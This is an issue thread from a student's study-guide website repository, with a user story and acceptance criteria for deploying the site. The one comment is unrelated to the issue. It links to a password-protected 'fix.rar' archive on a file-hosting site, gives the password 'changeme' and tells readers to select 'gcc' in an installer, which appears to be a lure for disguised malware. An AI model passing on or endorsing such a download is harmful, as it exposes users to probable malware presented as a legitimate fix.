### ISSUE TITLE
Deployment

### ISSUE THREAD

**Issue by toli-A** [toli-A/prework-study-guide#5]
# Deployment

## User Story
As a UofM student,
I want the prework notes to be structured on a webpage,
So that I can easily find and read the information

## Acceptance Criteria
GIVEN a Prework Study Guide website,
WHEN I visit the website using the URL,
THEN I can access my website from any browser

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
